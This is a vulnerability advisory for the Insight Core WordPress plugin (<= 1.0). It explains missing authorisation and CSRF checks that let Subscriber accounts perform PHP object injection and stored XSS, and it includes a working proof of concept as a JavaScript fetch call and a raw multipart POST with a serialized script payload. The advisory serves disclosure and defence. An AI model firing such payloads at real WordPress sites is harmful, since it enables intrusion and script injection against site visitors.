WordPress Plugin Vulnerabilities
Insight Core <= 1.0 - Subscriber+ PHP Object Injection & Stored XSS
Description
The plugin does not have any authorisation and CSRF checks in the insight_customizer_options_import (available to any authenticated user), does not validate user input before passing it to unserialize(), nor sanitise and escape it before outputting it in the response. As a result, it could allow users with a role as low as Subscriber to perform PHP Object Injection, as well as Stored Cross-Site Scripting attacks
Proof of Concept
let formData = new FormData; formData.append('import-file', new Blob(['a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";}'])) formData.append('action', 'insight_customizer_options_import'); fetch("https://example.com/wp-admin/admin-ajax.php", { "body": formData, "method": "POST" }) .then(response => response.text()) .then(data => console.log(data)); POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------189498983625966260651015514771 Content-Length: 458 Connection: close Cookie: [any authenticated user] -----------------------------189498983625966260651015514771 Content-Disposition: form-data; name="import-file"; filename="blob" Content-Type: application/octet-stream a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";} -----------------------------189498983625966260651015514771 Content-Disposition: form-data; name="action" insight_customizer_options_import -----------------------------189498983625966260651015514771-- The XSS will be triggered in all frontend pages
Affects Plugins
References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-28 (about 2 years ago)
Added
2022-02-15 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)